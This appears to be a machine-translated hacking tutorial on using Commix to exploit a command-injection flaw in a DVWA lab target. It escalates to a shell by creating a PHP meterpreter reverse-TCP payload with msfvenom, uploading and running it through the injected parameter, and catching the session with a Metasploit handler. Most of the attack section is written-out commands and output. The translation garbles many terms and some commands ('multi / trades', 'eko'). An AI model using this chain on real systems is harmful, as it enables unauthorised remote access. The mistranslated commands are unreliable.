<img src = "https://img.wonderhowto.com/img/13/62/63675792216954/0/use-commix-automate-exploiting-command-injection-flaws-web-applications.w1456.jpg" alt = "How to use Commix to automate the use of command injection deficiencies in web applications  In the terminal now we can write commix -h to view the help with all the different options this tool has to offer.  root @ drd: ~ # commix -h
Use: commix [option(s)]
-h, –help Show help and exit.
These options apply to general questions.
-v VERBOSE Residential level (0-4, Standard: 0).
–version View version number and end.
–output-dir = OUT .. Set the custom output directory path.
-s SESSION_FILE Download the session from a stored (.sqlite) file.
–flush session Flip session files for the current target.
–ignore session Ignore the results stored in the session file.
-t TRAFFIC_FILE Log in all HTTP traffic in a text file.
– batch Never ask for user input, use the default behavior.
–encoding = ENCOD .. Power tag coding used for data collection (e.g.
–charset = CHARSET Time-related injection kit (e.g.
– Check the internet Check the internet connection before you evaluate the target.
These options must be specified to define the destination URL.
-u URL, –url = Destination URL for the URL.
–url reload Update the destination URL after the command.
-l LOGFILE Parse destination from the HTTP proxy log file.
-m BULKFILE Scan multiple targets specified in a text file.
-r REQUESTFILE Download HTTP Request from a file.
–crawl = CRAWLDEPTH Scan the site from the destination URL (1-2,
-x SITEMAP_URL Parse Target (s) from Remote Site Map (.xml).
These options can be used to specify how to connect to the destination URL.
-d DATA, –data = .. Data string to be sent via POST.
–host = HOST HTTP host header.
–referer = Refer to HTTP Referer header.
–user-agent = AGENT HTTP User-Agent header.
–random agent Use a randomly selected HTTP User-Agent header.
–param-del = PDEL Enter characters to share parameter values.
–cookie = COOKIE HTTP Cookie header.
–cookie-del = CDEL Enter characters to divide cookie values.
-H HEADER, -hea .. Extra header (e.g. & # 39; X-Forwarded For: 127.0.0.1 & # 39;).
– headers = HEADERS Extra headers (eg & # 39; Accept-Language: fr NETag: 123 & # 39;).
–proxy = PROXY Use an HTTP proxy (for example, & # 39; 127.0.0.1: 8080 & # 39;).
–tor Use the Tor Network.
–tor-port = TOR_P .. Set Tor-proxyport (Default: 8118).
– torque check Make sure Tor is used correctly.
–auth-url = AUTH_ .. Login Panel URL.
–auth-data = AUTH .. Login parameters and data.
–auth-type = AUTH .. HTTP authentication type (e.g. & # 39; Basic & # 39; or & # 39; Digest & # 39;).
–auth-cred = AUTH .. HTTP authentication (eg admin: admin & # 39;).
–ignore-401 Ignore HTTP Error 401 (Not Authorized).
–force-ssl Force use of SSL / HTTPS.
–ignore redirects Ignore redirect attempts.
–retries = RETRIES retries when connection times (Default: 3).
We use the following options.
-u to define the destination URL. The option
– cookie = to set the appropriate cookie information. The option
– data = to enter the POST request string.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/-cookie = & #;; PHPSESSID = ba245268c2d2c08a209bf7db8bd004a0; security = low & # 39; - data = & # 39; ip = 127.0.0.1 & submit = submit
The tool launches and displays a banner with certain version information followed by some screen messages showing current status. We can see that there is a parameter that is vulnerable to the injection injection and asks us if we want a Pseudo-Terminal shell.
/ `___ / __` / & # 39; __` __` / & # 39; __` __` / / / & # 39; v2.6 stable
____ ____/ _ _ _ _ _ _ _/_/_ http://commixproject.com
/____//___/ /_//_//_//_//_//_//_////_/ (@commixproject)
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2018 Anastasios Stasinopoulos (@ancst)
[*] Checking connection to the target URL... [ SUCCEED ]
[!] Warning: Heuristics have failed to identify target application.
[*] Setting the POST parameter 'ip' for tests.
[!] Warning: The estimated response time is 10 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[*] Testing the (results-based) classic command injection technique... [ SUCCEED ]
[+] The POST parameter 'ip' seems injectable via (results-based) classic command injection technique.
[~] Payload: ;echo OOIVXD$((89+59))$(echo OOIVXD)OOIVXD
[?] Do you want a Pseudo-Terminal shell? [Y/n] >
If we press
Y it enters an interactive command room. We can now issue commands such as whoami and uname -a to display information about the server.
Pseudo-Terminal (Type & # 39;? & # 39; For Available Options)
commix (os_shell)> whoami
www data as
commix (os_shell)> uname -a
Linux metasploitable 2.6.24-16 server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
This is really useful, but we are a bit limited in what we can do. Fortunately, there is a way to combine Commix's functionality with the powerful msfvenom to finally get a metering session on the target.
Method 2: Download reverse Shell
Commix has a feature that allows us to write files on target systems. We will place a reverse shell on
which will call back to our attacking machine, but before we do, we need to create a payload.
Msfvenom is a payload generator that replaces both msfpayload and msfencode back in 2015. This single tool can be used to generate payload when working outside the Metasploit Framework.
Use the command
msfvenom using the following options.
lhost to set the listener's host address flag to enter the encoder.
flag flag to specify output format.
Make sure to write
> to write to the file payload.php .
root @ drd: ~ # msfvenom -p php / meterpreter / reverse_tcp lhost = 172.16.1.100 lport = 4321 -e php / base64 -f raw> payload.php
[-] No platform was selected by selecting Msf :: Module :: Platform :: PHP from payload
[-] No arch selected, choose arch: php from the payload
Found 1 compatible encoder
Try to encode payload with 1 iterations of php / base64
php / base64 managed with size 1507 (iteration = 0)
php / base64 power with final size 1507
Load Length: 1507 bytes
We see that the payload was created. Now we just need to add the PHP tags to our file. Enter
nano payload.php and add <? Php at the beginning of the file and ?> at the end of the file. Press Ctrl-X Y and Enter to save.
Now we need to open a manager on our machine to capture the session that opens on the target. In a new terminal window, enter Metasploit by typing the command
msfconsole . Then use use exploit / multi / trades to use the all-round merchant.
Then enter payload, listening address and port as we entered in our file earlier.
msf utilize (multi / trades)> set payload php / meterpreter / reverse_tcp
payload => php / meterpreter / reverse_tcp
msf exploit (multi / trades)> set lhost 172.16.1.100
lhost => 172.16.1.100
msf exploit (multi / trades)> set lport 4321
lport => 4321
Once set, start the manager by writing
run an alias for exploitation.
msf exploit (multi / trades)> run
[*] Started Reverse TCP Manager at 172.16.1.100:4321
Back in our second terminal, we can run Commix just like we did before with some extra options to get our payload on target.
– file-type the option to specify the file we want to use on our local machine. The option
– File Dest to set the target to the target. ] The option
– os-cmd indicates that the command should run when the file is written to the target.
commix -h http://172.16.1.102/dvwa/vulnerabilities/exec/ - -cookie = & #;; PHPSESSID = ba245268c2d2c08a209bf7db8bd004a0; security = low & # 39; - data = & # 39; ip = 127.0.0.1 & submit = submit & # 39; - file-write = & # 39; / root / payload.php & # 39; - file-dest = & # 39; / var / www / payload.php & # 39; os-cmd = & # 39; php -f /var/www/payload.php'
This allows our payload to be performed and a session is captured by our manager if everything works properly. Commix will run a bit and eventually we can see that our file was successfully created on the target.
[*] Testing (Performance-Based) Classical Command Injection Techniques ... [ SUCCEED ]
[+] The POST parameter "ip" appears injectable via (performance-based) classical command injection technology.
[~] Payment :; eko YJOSPV $ ((42 + 12)) $ (echo YJOSPV) YJOSPV
[+] The file /var/www/payload.php was successfully created!
Now back in the second terminal, we can see that a Meter's session was really opened. We can now run commands like
getuid and sysinfo to display information about the target.
[*] Sending steps (37775 bytes) to 172.16.1.102
[*] Meter Session 1 opened (172.16.1.100:4321 -> 172.16.1.102:40115) at 2018-10-18 11:29:19 -0500
Server username: www-data (33)
meter preter> sysinfo
OS: Linux metasploitable 2.6.24-16 server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meters: php / linux
These are similar results that we achieved earlier using Commix on our own, but now that we have a Metering session there is much more flexibility for what we can finally do.
Conclusion  Injection injection vulnerabilities are sought after by hackers because of their potential power over the target system. Commix is an extremely useful tool designed to automate finding and utilizing these vulnerabilities, making life a little easier for the hacker.
In this guide, we learned some basic usage options. In addition, we saw how to combine msfvenom with Commix to load a payload to the target and get a shell. This flexibility makes Commix an excellent complement to any
Do not miss: Use Metasploit's web browser script and command injection to pop a shell
Cover image of jarmoluk / Pixabay; Screenshots of drd_ / Null Byte